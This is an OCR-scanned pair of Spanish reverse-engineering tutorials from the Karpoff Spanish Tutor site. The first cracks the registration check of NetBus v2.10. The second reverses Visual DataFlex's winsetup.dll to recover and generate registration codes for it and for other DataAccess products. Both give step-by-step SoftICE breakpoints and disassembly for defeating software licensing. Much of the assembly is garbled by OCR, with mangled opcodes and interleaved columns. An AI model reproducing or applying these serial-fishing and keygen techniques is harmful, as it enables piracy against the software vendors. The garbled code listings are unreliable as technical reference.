karpoff spanish tutor: pagina dedicada a la dibulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


NetBus v2.10 


Herramientas: — [File InsPEctor, Softlce, DeDe. 
CRACKER: DeK_0OiN FECHA: 06/11/2000 


INTRODUCCION 


Aquí con otro manual. Esta vez de un programa que no necesita presentación. Ya todos lo deben conocer 
¡jeje!. Podremos comprobar lo útil que puede sernos el DeDe. Vamos a crackear!. 


AL ATAKE 


Antes que nada, analizamos el NetBus.exe con el File InsPEctor y obtenemos la siguiente información: 


e No está empakado 
e Ni encryptado 
e Hecho en Delphi 3.0 


Si el programa está hecho en Delphi, ya tenemos una gran herramienta creada por DaFixer, llamada DeDe, el mejor decompilador 
de Delphi del momento. Abrimos DeDe y decompilamos el netbus.exe. En la barra de estado hay una opción que dice Procedures, 
pues esta siempre nos será la más importante. Ahora a buscar!!. Voy presionando la R para ver si hay algo tipo Register y si!, 
Register TRegisterForm. Hacemos clic sobre eso y a la derecha aparecerán cosas como CancelButtonClick, HowToBtnClick, 
RegButtonClick y FormShow. La que me parece más interesante es la de RegButtonClick ya que nos mostrará que pasará cuando 
hagamos clic en el botón de Register. Hacemos doble clic sobre RegButtonClick y nos aparecerá el código en ASM exactamente 
igual a como lo veríamos en el W32Dasm. Examinemos el código. Centrémonos en esta parte: 


004E0D01 E9062AF2FF jmp 0040370C 
004E0D06 EBFO Jjmp 004E0CF8 
004E0D08 E86F54FFFF Ccal1 004D617C ¡llama a la rutina de comprobación 


004E0D0D 84C0 test al, al ¿el flag devuelto es cero? 


004E0DOF 7414 jz 004E0D25 


si es así, jz_error 


004E0D11 B940000000 mov ecx, $00000040 ;si no es cero continúa 


;y muestra los mensajes 


* Possible String Reference to: "Thanks" 


004E0D16 BAA40D4E00 


¡de gracias por registrarse! 


mov edx, $004E0DA4 
* Possible String Reference to:"Thanks for registering NetBus Pro and 


supporting Shareware software." 


004E0D1B B8B40D4E00 mov eax, $004E0DB4 
004E0D20 E8736F0000 call 004E7C98 
004E0D25 8B45FC mov eax, [ebp-$04] 
004E0D28 E8ATECF6FF call 0044F9D4 
004E0D2D 33C0 xor eax, eax 


Podríamos cambiar el jz a ¡nz pero recuerden, es mejor encontrar un serial válido cuando se puede en vez de hacer parcheos. ¿Que 
pasaría si el Net Bus tuviera protección CRC (cosa que dudo)?. Podríamos saltarla con un je a un jne o podríamos pasarnos una 
eternidad tratando de ver como quitarlo. Yo opto por no probar. Sabemos donde está la llamada a la rutina de comprobación así 
que las cosas se nos harán más fáciles con el SiCE. 


Vamos al Symbol Loader del SiCE y cargamos el NetBus. Le damos al botón de los engranajes y aparecerá un mensaje de error. 
Le damos a si y entramos al SiCE. Ya saben que hacer, bpx 4E0D08 luego salimos del SiCE y rellenamos los datos de registro. Yo 


pondré los siguientes: 


e Nombre: DeK_OiN 
e Company: K-FoR 
e Key: ABC123 


Pulsamos Register y efectivamente!, esta call llama la rutina de comprobación. Pulsamos F8 para entrar en la call y aparecemos 


aquí: 

:004D617C 55 push ebp ; aquí aparecemos 
:004D617D 8BEC mov ebp, esp 

:004D617F 81C4E8FDFFFF add esp, FFFFFDE8 

:004D6185 33C0 xor eax, eax 

:004D6187 8985E8FEFFFF mov dword ptr [ebp+-FFFFFEE8], eax 

:004D618D 8D45EC lea eax, dword ptr [ebp-14] 

:004D6190 8B153C5F4D00 mov edx, dword ptr [004D5F3C] 

:004D6196 E851E3F2FF call 004044EC 

:004D619B 33C0 xor eax, eax 

:004D619D 55 push ebp 

:004D619E 686C624D00 push 004D626C 

:004D61A3 64FF30 push dword ptr fs:[eax] 

:004D61A6 648920 mov dword ptr fs:[eax], esp 

:004D61A9 8D45EC lea eax, dword ptr [ebp-14] 

:004D61 AC ES97FEFFFF call 004D6048 ¡lee nuestra company 
:004D61B 1 33C9 XoOr ecx, ecx 

:004D61B3 B201 mov dl, 01 

:004D61B5 A150534D00 mov eax, dword ptr [004D5350] 


:004D61BA ESD1F9FFFF 
:004D61BF 8945F8 
:004D61C2 33C0 
:004D61C4 55 

:004D61C5 683E624D00 
:004D61CA 64FF30 
:004D61CD 648920 
:004D61D0 8D85ESFEFFFF 
:004D61D6 8B4DF0 
:004D61D9 BA84624D00 
:004D61DE ESD1DDF2FF 
:004D61E3 8B95E8FEFFFF 
:004D61E9 8D85ECFEFFFF 
:004D61EF B9FF000000 
:004D61F4 ES4BDDF2FF 
:004D61F9 8$D85ECFEFFFF 
:004D61FF 50 

:004D6200 8D85E8FDEFFF 
:004D6206 8B55EC 
:004D6209 B9FF000000 
:004D620E E831DDF2FF 
:004D6213 8D95E8FDFFFF 
:004D6219 8B45F8 
:004D621C 59 

:004D621D E842F8FFFF 
:004D6222 85C0 

:004D6224 0F9445FF 
:004D6228 33C0 


Bien, nos paramos sobre la call que generará nuestro serial y apretamos F8 para entrar. 


:004D5A64 53 
:004D5A6S5 56 
:004D5A66 57 
:004D5A67 83C4C0 
:004D5 AGA 8BFl 
:004D5A6C 8D3C24 
:004D5A6F 33C9 
:004D5A71 SAOE 
:004D5A73 80F909 
:004D5A76 7202 
:004D5A78 B109 
:004DSA7A 880F 
:004D5A7C 46 
:004D5A7D 47 
:004DS5A7E F3 


call 004D5B90 

mov dword ptr [ebp-08], eax 

xor eax, eax 

push ebp 

push 004D623E 

push dword ptr fs:[eax] 

mov dword ptr fs:[eax], esp 

lea eax, dword ptr [ebpp+FFFFFEE8] 
mov ecx, dword ptr [ebp-10] 

mov edx, 004D6284 

call 00403FB4 

mov edx, dword ptr [ebp+-FFFFFEES8] 
lea eax, dword ptr [ebp+FFFFFEEC] 
mov ecx, OOOOOOFF 

call 00403F44 

lea eax, dword ptr [ebpp+FFFFFEEC] 
push eax 

lea eax, dword ptr [ebp+FFFFFDES] 
mov edx, dword ptr [ebp-14] 

mov ecx, OOOOOOFF 

call 00403F44 

lea edx, dword ptr [ebp+FFFFFDES8] 
mov eax, dword ptr [ebp-08] 

pop ecx 

call 004D5A64 

test eax, eax 

sete byte ptr [ebp-01] 


Xor €ax, tax 


push ebx 

push esi 

push edi 

add esp, FFFFFFCO 
mov esi, ecx 

lea edi, dword ptr [esp] 
XOr €eCX, ecx 

mov cl, byte ptr [esi] 
cmp cl, 09 


jb 004DSATA 


mov cl, 09 

mov byte ptr [edi], cl 
inc esi 

inc edi 


repz 


; ecx tiene serial falso 
; sl escribimos d ecx veremos nuestro 
; código falso y con d edx veremos $ 


; (solo si nos paramos en la call) 


; copia $ABC123 


; calcula la longitud del name 


; llama a la rutina de generación del serial 


; (debemos pararnos en esa call) 


Aquí apareceremos: 


; copia la lonitud del serial a cl 
; longitud del serial debería ser 8 + 1 del $ 
; Si es menor nos vamos al error 


; de lo contrario tenemos la longitud en cl 


:004D5A7F A4 
:004D5A80 8BF2 
:004D5A82 8D7C240A 
:004D5A86 33C9 
:004D5A88 SAOE 
:004D5A8SA 80932 
:004D5A8D 7202 
:004D5ASF B132 
:004D5A91 880F 
:004D5A93 46 
:004D5A94 47 
:004D5A9S5 F3 
:004D5A96 A4 
:004D5A97 8BD8 
:004D5A99 33D2 
:004DS5A9B 8A54240A 
:004D5A9F 42 
:004DSAAO 83FA32 
:004D5AA3 7FOE 
:004D5AAS 8D44140A 
:004D5AA9 C6002A 
:004D5AAC 42 
:004DSAAD 40 
:004D5AAE 83FA33 
:004D5AB1 75F6 
:004D5AB3 8BCC 
:004D5AB5 8D54240A 
:004D5AB9 8BC3 


:004D5ABB ESFCFEFFFF 


:004D5ACO 84C0 
:004D5AC2 7458 
:004D5AC4 33F6 


:004D5AC6 8D8338030000 


:004D5ACC 8D54240A 
:004DSADO B132 


movsb 

mov esi, edx 

lea edi, dword ptr [esp+0A] 
XOr €eCX, ecx 

mov cl, byte ptr [esi] 

cmp cl, 32 

jb004D5A91 

mov cl, 32 

mov byte ptr [edi], cl 

inc esi 

inc edi 

repz 

movsb 

mov ebx, eax 

xor edx, edx 

mov dl, byte ptr [esp+0A] 
inc edx 

cmp edx, 00000032 

jg 004D5AB3 

lea eax, dword ptr [esp+edx+0A] 
mov byte ptr [eax], 2A 
inc edx 

inc eax 

cmp edx, 00000033 

jnz O0O4£DSAA9 

mov ecx, esp 

lea edx, dword ptr [esp+0A] 
mov eax, ebx 

call 004D59BC 

test al, al 

32 004D5B1C 


xor esi, esi 


lea eax, dword ptr [ebx+00000338] 


lea edx, dword ptr [esp+0A] 


mov cl, 32 


; edx = 8 = longitud que debería tener el 
; serial la compara con 32 (50 en decimal) 
; SI es mayor nos vamos al error 


; si es menor continuamos 


; llama a la rutina que genera nuestro serial 
; ¿flag devuelto es cero? 


; sies así, felicidades!!! 


Cuando llegamos 004D5AB1 hay un pequeño bucle por lo que escribimos G 004D5AB3 (dirección siguiente al ¡nz 0O4D5AA9. 
Ahora si podemos seguir con F10 hasta llegar a la call que genera el serial (tal vez dentro de esa call hay otras calls que generan el 
serial). Ahora le damos a Fl0 para pararnos sobre el test al, al y ponemos D edx. Bajamos una línea en la ventana de datos y ya 
tenemos nuestro serial válido! (asegúrense de escribirlo sin el $). 


Esto es todo, espero que les haya gustado el tutorial, si es así, háganmelo saber. Recuerden, antes de preguntar pásense por los 
foros de TNT WkT y kUT. NO responderé a los pedidos de cracks y tampoco a los mails que vienen con un ejecutable adjuntado. 
Si no respondo a un mail es por eso así que nada de excusas de "ahh!, pobre de mi que no podré alimentar a mi familia!". Y 
también todos tienen que recordar que este tutorial fue creado SOLO con fines educativos y que yo NO puedo hacerme 
responsable del uso que le puedan dar. Si te gusta el programa COMPRALO!, apoya al shareware, sino el no podríamos aprender 


nada!!!. 


Saludos a: 


Profesor X 

Txeli 

Todos los de [K-FoR] 
Act MagO 

Xasx 

Mr.Jade 

SkUaTeR 

Karpoff 


Nos vemos en el próximo tutorial!, 


Astalavista 


Página oficial del grupo K-FoR:_http://pagina.de/kfor 
Mi dirección de E-Mail: dek ointdhotmail. com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 
Programa: Ir ra ea 


PROTECCION: Serial, Nag screen y límite de tiempo. 
Descripcion: | Excelente herramienta RAD para desarrollo de aplicaciones de base de datos 
Dificultad: supongo que fácil aunque para mi no tanto 


Visual DataFlex 6.2: ftp.dataaccess.com/pub/products/vdf/eval/Setup62.exe (41 Mb) 
DOWNLOAD : Visual DataFlex 7.0: ftp.dataaccess.com/pub/products/vdf/eval/Setup7.exe (42 Mb) 
WebApp Server 2.x: ftp.dataaccess.com/pub/products/webapp/eval/Setup .EXE (22 Mb) 


herramientas: —— |[Softlce 3+, W32Dasm, Hex Editor 


INTRODUCCION 


El mismo programa sirve para registrar el resto de las aplicaciones de la empresa DataAccess: WebApp 
Studio x.x y WebApp Server x.x utilizando además el mismo esquema de registración que el usado para el 
programa que nos ocupa. 


AL ATAKE 


Visual dataflex es, al decir de sus desarrolladores, "una suite de herramientas de software, una metodología de diseño, 
componentes de aplicaciones, un procesador de transacciones dbms con opciones cliente-servidor, construidos 
alrededor de un maduro 4gl orientado a objetos. desarrolladores profesionales a través del mundo lo usan para crear 
aplicaciones de base de datos de alta performance para windows 95/98 y windows nt. con visual dataflex usted puede: 


-producir aplicaciones de base de datos mas rápidamente gracias a su ide specialmente puesta a punto para manipular 
bases de datos. 


-extender la funcionalidad de sus aplicaciones a traves de un probado 4gl orientado a objetos. 
-conectar su aplicaciones con los rdbms lideres del mercado. 

integrar facilmete su aplicaciones a la web mediante la utilización de webapp server. 

-además visual dataflex incluye un poderoso dbms para distribuir sus aplicaciones libre de regalías." 


¿software prometedor no? al inicio tenemos que decidir si vamos a instalar la version de desarrollo para lo cual 


debemos ser dueños de una licencia o, por el contrario, si deseamos probar la aplicación por 60 días. instalando la 
segunda opción tendremos posibilidad de registrarnos mas tarde mediante el programa register.exe que se encuentra en 
la carpeta Wbin de la instalación. 


para conocer las características de nuestra victima corremos el file analyzer el cual nos muestra que el ejecutable no 
esta protegido contra desensamblado, que no esta empaquetado y que está compilado con borland/inprise delphi 4. 
ejecutando el programa nos aparece la siguiente pantalla de registro que nos solicita numero serial, nombre de usuario 
y código de registro. además nos muestra una ventana de existing registrations con los siguientes datos: 


serial num: 1 
registered name: data access corporation 


product: visual dataflex 7.x evaluation 


y dos botones deshabilitados set default name y delete registration. evidentemente este programa nos debería permite 
registrar distintos usuarios (¿productos también?) y mantenerlos a través de los botones antes mencionados. 


[DJRegister Your Data Access Worldwide Product Y -10/ xf 


Enter Registration Details 


You must registerthe product before you can use it. Enter your 
registration details exactly as printed 


Serial Number: [ 
Registration Name: | 
Registration Code: | 


—Existing Registrations- 
| Produet | RegisteredName nat 
«2 Visual DataFlex 7.x Evaluation Data 4ccess Corporation 
SetDefaultWName Delete Registration 


Wersion: 2.0 
Copyright: 1999 Data 4ccess Corporation lose | 


en virtud de los escasos conocimientos que poseo respecto a la ingenieria inversa he decidido atacar la protección por 
el lado de la generación de un número de código que permita registrar el programa en vez de analizar el esquema 
temporal de los 60 días de prueba. al comenzar el análisis del programa a través del listado muerto generado por 
w32dasm rápidamente podemos ver, en la sección imports, que register.exe llama a winsetup.dll. el mismo se 
encuentra en la carpeta Wbin antes mencionada. winsetup.dll posee las siguientes funciones: 


winsetup.commitregistration 
winsetup.deleteregistration 
winsetup.getactiveregistration 
winsetup.getregistrationcount 
winsetup.getregistrationname 
winsetup.getregistrationproduct 
winsetup.getregistrationserialnumber 


winsetup.registerproduct 
winsetup.setactiveregistration 
winsetup.setactiveregistration 


nombres lo suficientemente sugestivos y que se asemejan más a una luz de un faro en medio de la tormenta que a los 
destinados a proteger un software de u$s 1.000 para el caso de visual dataflex o de más de u$s 2.000 para webapp 
server. ¿existirá una relación inversamente proporcional entre el precio del software y la calidad de su esquema de 
protección? 


que otra cosa interesante, bien veamos la string data references y sorpresa, entre otras cosas podemos ver aún luces 
mas intensas: 


string resource id=40009: "that combination of codes is invalid. please re-enter your 1" 
string resource id=40010: "congratulations. your license is now registered." 

string resource id=40021: "unable to register the product as an error occurred trying t" 
string resource id=40024: "unable to register the product as you have exceeded the maxi" 
string resource id=40025: "unable to register the product as it couldn't be set as the " 
string resource id=40026: "a termlist.cfg was found, but it is corrupted. either delete" 


ya podemos extraer algunas conclusiones importantes, a saber: 


a. las rutinas de protección deben encontrarse en winsetup.dll (con semejantes nombres...) 

b. el archivo termlist.cfg, que también se ubica en Wbin, se encuentra vinculado de uno u otro modo en el esquema 
de registro del producto. 

c. tenemos un posible punto de entrada en la cadena id=40010 "congratulations..." la cual no se repite en ningún 
otro punto del desensamblado, a diferencia de la cadena id=40021 y similares. 


bien, manos a la obra. iniciamos el análisis por el lado del punto b). termilst.cfg es un archivo binario que nos muestra 
lo siguiente: 


00000000h: 44 61 74 61 20 41 63 63 65 73 73 20 43 61 72 70 ; data access corp 
00000010h: 6f 72 61 74 69 6f 6e 00 00 00 00 00 00 00 00 00 ; poration 
00000020h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

00000030h: 00 00 la 00 01 00 00 00 10 18 80 00 01 00 00 00 

00000040h: 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

00000050h: 00 00 00 00 00 00 00 00 09 1f 5d a9 00 00 00 00 

00000060h: 00 00 00 00 00 00 00 00 01 00 01 00 00 00 00 00 


el archivo es simétrico respecto a la posición 400h mostrando exactamente la misma información. si renombramos el 
archivo nos desaparece la información que muestra la ventana de existing registrations. con esto ya podemos inferir 
que es éste el archivo que guarda la información de registro. 


la parte del codigo de desensamblado donde aparece termlist es la siguiente: 


¿2 URSoft W32Dasm Yer 8.93 Program DisassemblerDebugger 


Disassembler 


Project Debug Search Goto Execute Text Functions HexData Refs Help 


* Referenced by a CALL at Address: 
|:0044B97C 


* Reference To: winsetup.RegisterProduct, Ord: 0000h 


:0044B7?0C FF25B0F64400 
:0044B7?12 SECO 


| 
Jmp dword ptr [0044F6B0] 
mov eax, eax 


* Referenced by a CALL at Addresses: 


|:0044BA20 + D044BE29 , :D044C0A8 

l 

:0044B7?14 55 push ebp 

:0044B715 SBEC mov ebp, esp 

:0044B717 83C4E0 add esp, FFFFFFEO 

:0044B71A 53 push ebx 

:0044B71B 56 push esi 

:0044B7?1C 33D2Z xor edx, edx 

:0044B71E S955E0 mov dword ptr [ebp-20], edx 
:0044B7?21 8945FC mov dword ptr [ebp-04], eax 
:0044B724 33C0 xor eax, eax 

:0044B726 55 push ebp 

:0044B727 6814B94400 push 0044B914 

:0044B72C 64FF30 push dword ptr fs: [eax] 
:0044B72F 648920 mov dword ptr fs: [eax], esp 
:0044B732 8B45FC mov eax, dword ptr [ebp-04] 
:0044B735 8B928F4020000 mov ebx, dword ptr [eax+000002F4] 
:0044B73B SBS8308020000 mov eax, dword ptr [ebx+00000208] 
:0044B741 ES62C9FFFF call 00448048 

:0044B746 48 dec eax 

:0044B747 85C0 test eax, eax 

:0044B749 7C1F j1l 0044B76A 

:0044B74B 40 inc eax 

:0044B74C 8945E4 mov dword ptr [ebp-1C], eax 


* Referenced by a (U)nconditional 


or (Cjonditional Jump at Address: 


|:0044B768(C) 

l 

:0044B74F SB45FC mov eax, dword ptr [ebp-04] 
:0044B752 8B80F4020000 mov eax, dword ptr [eax+000002F4] 
:0044B758 S8BS008020000 mov eax, dword ptr [eax+00000208] 
:0044B75E 33D2 xor edx, edx 

:0044B760 ES4BDIFFFF call 004488B0 

:0044B765 FF4DE4 dec [ebp-1C] 

:0044B768 75ES jne 0044B74F 


* Referenced by a (U)nconditional 
|:0044B7491(C) 

l 

:0044B76A SD45FS 

:0044B7?6D 50 


Al] 


or (Cjonditional Jump at Address: 


lea eax, dword ptr [ebp-08] 
push eax 


Line:171989 Pg 2073 of 2093 File:C:Temp'Register.exe 


una llamada a winsetup.registerproduct y luego otra a getactiveregistration donde aparentemente podría estar leyendo 
el archivo termlist.cfg para determinar el usuario activo y su código de registro en virtud de que luego de esta llamada 
aparecen dos comparaciones que pueden saltarse el texto mencionado en string resource id=40026 tal como se ve a 
continación: 


¿2 URSoft W32Dasm Yer 8.93 Program Disassembler 'Debugger 


Disassembler Project Debug Search Goto Execute Text Functions HexData Refs Help 


* Reference To: winsetup.CetiActiveRegistration, Ord: O0000h 
| 


:0044B773 59 pop ecx 

:0044B774 85C0 test eax, eax 

:0044B776 742B je 0044B7A3 

:0044B778 83F804 cmp eax, 00000004 

:0044B77B 7426 je 0044B7A3 

:0044B77D SDSSEO lea edx, dword ptr [ebp-20] 

* Possible Reference to String Resource ID=40026: "A .Ccfg was 
| 

:0044B7?80 BS5A9C0000 mov eax, O00DO9C5A 

:0044B785 ESEECSFEFF call 00407B78 

:0044B78A S8B45E0 mov eax, dword ptr [ebp-20] 

:0044B7?8D ESlI69DFFFF call 004454483 

:0044B792 A150DD4400 mov eax, dword ptr [0044DD50] 

:0044B797 S8BOO mov eax, dword ptr [eax] 

:0044B799 ESDA7TSFFFF call 00442FAS5 

:0044B7?9E E9S5BO10000 jmp 0044BSFE 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
1:0044B77?6(C), :0044B77B(C) 

| 

:0044B7A3 8D45E8 lea eax, dword ptr [ebp-18] 
:0044EB726 50 push eax 


* Reference To: vinsetup. 6etRegistrationlCount, Ord: 0000 
| 


:0044B7A7 ESZ2OFFFFFF Call 0044B6CC 

:0044B7AC 59 pop ecx 

:0044B7AD S8B45E8 mov eax, dword ptr [ebp-18] 
:0044B7B0 85Cc0 test eax, eax 

:0044B7B2 0OFSE46010000 jle 0044BSFE 

:0044B7B8 8945E4 mov dword ptr [ebp-1C], eax 
:0044B7?BB BEO1000000 mov esi, 00000001 


* Referenced by a (V)inconditional or (Cjonditional Jump at Address: 


|:0044BSF8(C) 

| 

:0044B7C0 8D45F4 lea eax, dword ptr [ebp-0C] 
:0044B7?C3 50 push eax 

:0044B7C4 56 push esi 


* Reference To: winsetup.CetRegistrationName, Ord: 0000 
| 


:0044B7C5 ESl12FFFFFF Call 0044B6DC 

:0044B7?CA 830408 add esp, 00000008 
:0044B7CD 85C0 test eax, eax 

:0044B7CF 7426 je 0044B7F7? 

:0044B7?D1 SDS55EO lea edx, dword ptr [ebp-20] 


Al] 


| Line:172040 Pg 2073 and 2074 of 2093 Code Data (2:0044B76E (DOffset DOD4ABEEh in File:C:ATemp' 


luego hay llamadas a 


winsetup.getregistrationcount 
winsetup.getregistrationname 
winsetup.getregistrationproduct 
winsetup.getregistrationserialnumber 


todas con comprbaciones que nos pueden conducir a nuestro string resource id=40021: "unable to register the product 


as an error occurred trying t" y strings siguientes, de la forma: 
mov eax, "unable to register the product..." 


call 00407b78 


esto es indicativo que las llamadas anteriores tienen como propósito obtener valores de registro para nombre de 
usuario, tipo de producto (debe ser posible registrar otro producto), número serial... 


si seguimos observando un poco más podremos ver una llamada a winsetup.commitregistration con una comprobación 
y salto a nuestra string resource id=40010: "congratulations. your license is now registered." la cual tambien es única 
dentro del desensamblado tal cual se muestra: 


¿2 URSolt W32Dasm Yer 8.93 Program Disassembler 'Debugger 


Disassembler Project Debug Search Goto Execute Text Functions HexData Refs Help 


:0044B9F2 EB31 jmp 0044BA25 


* Referenced by a (U)nconditional or (C)jonditional Jump at Address: 
| 


* Reference To: vinsetup.CommitRegistration, Ord: 0000h 
| 


:0044B9F4 ESOBFDFFFF Call 0044B704 
:0044B9F9 85C0 test eax, eax 
:0044B9FB 740C je 0044BA09 
:0044B9FD ESS4BA4400 mov eax, 0044BA84 
:0044BA02 ESAL9GAFFFF call 004454483 
:0044BA407 EB15 jmp 0044BA1E 


* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 
|:0044B9FB (C) 

l 

:0044BA09 S8D55FO lea edx, dword ptr [ebp-10] 


* Possible Reference to String Resource ID=40010: "Congratulations. Your 
l 


:0044BA40C BS84A9C0000 mov eax, O0009C4A 
:0044BA11 ES62C1FBFF call 00407B78 

:0044BA16 8B45FO mov eax, dword ptr [ebp-10] 
:0044BA19 ESSA9SAFFFF call 00445448 


* Referenced by a (V)inconditional or (Cjonditional Jump at Address: 


|:0044BA07 (0) 

l 

:0044BA1E SBC3 mov eax, ebx 
:0044BA420 ESEFFCFFFF call 0044B7?14 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
1:0044B99E (0), :0044B9BD(0), :0044B9CD(U), :0044B9F2(U) 
l 


:0044BA25 33C0 xor eax, eax 

:0044BA27 5A pop edx 

:0044BA28 59 pop ecx 

:0044BA29 59 pop ecx 

:0044BA2A 648910 mov dword ptr fs: [eax], edx 
:0044BA2D 6847BA4400 push 0044BA47 


* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 


1:0044BA45(U) 

l 

:0044BA32 8D45FO lea eax, dword ptr [ebp-10] 
:0044BA435 BAD4000000 mov edx, 00000004 
:0044BA43A ESDD7DFEFF call 0040381C 


:0044BA3F C3 ret 


:0044BA35 BA04000000 mov edx, 00000004 
:0044BA3A ESDD?DFEFF call 0040381C 
:0044BA3F C3 ret 


All 


Line:172338 Pg 2077 of 2093 File:C:4TemptRegister. exe 


ahora desensamblamos winsetup.dll para ver si podemos observar algo interesante. en los imports vemos varias 


llamadas a user32.wsprintfa una función usada para el formateo de caracteres y en todos los casos usa en forma 
recurrente: 


possible stringdata ref from data obj ->"%kx-%x+.. ." 
no será que el código de registro es del tipo caracteres-caracteres.... 


vemos también una llamada a messagebeep que podria ser indicativo de una advertencia por mal registro (de acuerdo a 
lo que he leido en varios manuales de ingeniería inversa) y aparece también en un solo lugar del desensamblado (luego 
analizando los mismos programas de la version 6.2 pude conocer que es una llamada a la función dfregistertermlist es 
decir dataflex registrar termlist) mostrando lo siguiente: 


referenced by a call at addresses: e dfregistertermlist 
1:1000232a , :10002343 , :100024c1 


:100013c0 56 push esi 

:100013c1 8b742410 mov esi, dword ptr [esp+10] 
:100013c5 57 push edi 

:100013c6 56 push esi 

:100013c7 56 push esi 

* reference to: user32.chartooema, ord:002bh 


:100013c8 ff15e4700010 call dword ptr [100070€e4] 

:100013ce b900010000 mov ecx, 00000100 

:100013d3 33c0 xor eax, eax 

:100013d5 bfd0900010 mov edi, 100090d0 

:100013da f3 repz 

:100013db ab stosd 

:100013dc 8b442418 mov eax, dword ptr [esp+18] eax = cálculo entre serie y usuario? 
:100013e0 8b4c2410 mov ecx, dword ptr [esp+10] ecx = registration code (ingresado) 
:100013e4 50 push eax 

:100013€e5 56 push esi esi = registration name 

:100013€e6 51 push ecx 

:100013e7 68d0900010 push 100090d0 

:100013ec e8 1fffffff call 10001310 e llamada interesante 

:100013f1 83c410 add esp, 00000010 

:10001314 84c0 test al, al comprueba el valor de retorno 

:10001316 5f pop edi 

:100013f7 5e pop esi 

:10001318 750e ¡ne 10001408 si ne evita la llamada a messagebeep 

:100013fa 6200 push 00000000 


* reference to: user32.messagebeep, ord:01bdh 
| 
:100013fc ff15e8700010 call dword ptr [100070e8] 


:10001402 b801000000 mov eax, 00000001 
:10001407 c3 ret 


* referenced by a (u)nconditional or (c)onditional jump at address: 
[:100013f8(c) 


:10001408 a1d8940010 mov eax, dword ptr [100094d8] 
:1000140d 648b0d2c000000 mov ecx, dword ptr fs:[0000002c] 
:10001414 8b542404 mov edx, dword ptr [esp+04] 

:10001418 6a5c push 0000005c 

:1000141la 8b0481 mov eax, dword ptr [ecx+4*eax] 

:1000141d 68d0900010 push 100090d0 

:10001422 cle20a shl edx, Oa 

:10001425 8d8c1038000000 lea ecx, dword ptr [eax+edx+00000038] 
:1000142c 51 push ecx 

:1000142d e84e120000 call 10002680 

:10001432 83c40c add esp, 0000000c 

:10001435 33c0 xor eax, eax 

:10001437 c3 ret 


para poder probar nuestros descubrimientos ingresaremos: 


serial number: 222222 
registration name: sujeto tacito 
registration code: 88888888-99999999 


a los efectos de intentar pescar el serial vamos a utilizar el softice pero agregando a winice.dat la linea 


exp=carchiv=-1WvdfMbinwinsetup.dll de manera de poder acceder a las funciones que se encuentran dentro de la dll. 
podríamos establecer un bpx registerproduct. el mismo efecto lograríamos estableciendo un bpx hmemcpy luego de 
ingresados los datos, pulsar el botón add, luego dos veces crtl-d para seguirle la pista al código de registro , después 
pulsar algunos f12 para llegar a register.exe (creo que siete para ser mas preciso) y desde ahí y luego de algunos f10 
estaríamos en la misma función. incluso podemos establecer un breakpoint en la función winsetup.generateregcode 
(nombre sugestivo no) y lograr el mismo efecto. 


independientemente del camino que elijamos llegaremos tarde o temprano a la llamada mencionada en el párrafo 
anterior por lo podemos suponer que en: 


:100013ec es 1fffffff call 10001310 


debería estar la rutina que nos lleve al serial correcto. un breakpoint en esta llamada y luego f8 para analizar que 
sucede. 


* referenced by a call at address: 
|:100013ec 


:10001310 8b442408 mov eax, dword ptr [esp+08] 
:10001314 53 push ebx 

:10001315 8b5c2408 mov ebx, dword ptr [esp+08] 
:10001319 56 push esi 

:1000131a 57 push edi 

:1000131b 50 push eax 

:1000131c 53 push ebx 

:1000131d eSdefcffff call 10001000 

:10001322 8b7c2420 mov edi, dword ptr [esp+20] 
:10001326 83c9ff or ecx, f£EfEfff 

:10001329 33c0 xor eax, eax 


:1000132b 53 push ebx 

:1000132c £2 repnz 

:1000132d ae scasb 

:1000132e £7d1 not ecx 

:10001330 2bf9 sub edi, ecx 

:10001332 8b442428 mov eax, dword ptr [esp+28] 
:10001336 8bd1 mov edx, ecx 

:10001338 8bf7 mov esi, edi 

:1000133a 8bfb mov edi, ebx 

:1000133c c1e902 shr ecx, 02 

:1000133f f3 repz 

:10001340 a5 movsd 

:10001341 8bca mov ecx, edx 

:10001343 83e103 and ecx, 00000003 
:10001346 f3 repz 

:10001347 a4 movsb 

:10001348 894334 mov dword ptr [ebx+34], eax 
:1000134b esaOffffff call 100012f0 llamada al cálculo del serial 
:10001350 83c40c add esp, 0000000c 
:10001353 5f pop edi 

:10001354 Se pop esi 

:10001355 5b pop ebx 

:10001356 c3 ret 

con f8 en call 100012f0 llegamos a: 

* referenced by a call at address: 

[:1000134b 


:100012f0 56 push esi 

:100012f1 8b742408 mov esi, dword ptr [esp+08] 

:100012f5 6a58 push 00000058 

:100012f7 56 push esi 

:100012f8 es 13ffffff call 10001210 cálculo del serial. en eax=serial correcto 
:100012fd 8b4e58 mov ecx, dword ptr [esi+58] en ecx=serial ingresado 
:10001300 83c408 add esp, 00000008 

:10001303 3bc8 cmp ecx, eax compara ingresado con calculado 
:10001305 Of94c0 sete al buen chico al=01 

:10001308 5e pop esi 

:10001309 c3 ret 


bien, hemos alcanzado el nudo de nuestra cuestión. en eax obtenemos la primera parte del código de registro (la que 
está antes del guión) ya que el calculo se basa en la segunda parte ingresada (después del guión.). 


luego de la pantalla de error ingresamos nuevamente el serial mostrado en eax y sorpresa hemos registrado una licencia 
para visual dataflex pero versión 6.x, de la versión 7.x nada. el archivo termlist.cfg se ha creado (recuerdan que lo 
habiamos renombrado) en Ybin tal lo esperado, conteniendo el nombre de usuario y las dos partes del código de registro 
claramente visibles en 438h la segunda y en 458h la primera. estos valores no son simetricos respecto a los 
visualizados en 38h y 58h pero si seguimos avanzando un poco podremos ver que la función antes mencionada es 
llamada dos veces y en su segunda vez genera los códigos mostrados en 38h y 58h. además si ingresaramos estos 
últimos códigos obtenidos en la pantalla de registro el archivo termlist generado será simetrico y por ende mostrará los 
mismos valores en sus dos mitades, tal cual pudimos ver con el archivo renombrado. 


aplicando la fuerza bruta (nada de zen) podremos observar que variando la segunda parte del código de registro es 
posible generar códigos correctos entre otros para: 


webapp server 1.x eval, webapp server 2.x 
webapp server 1.x, webapp server 2.x eval 
webapp server 2.x (mp) (sp) 

webapp studio 2.x 


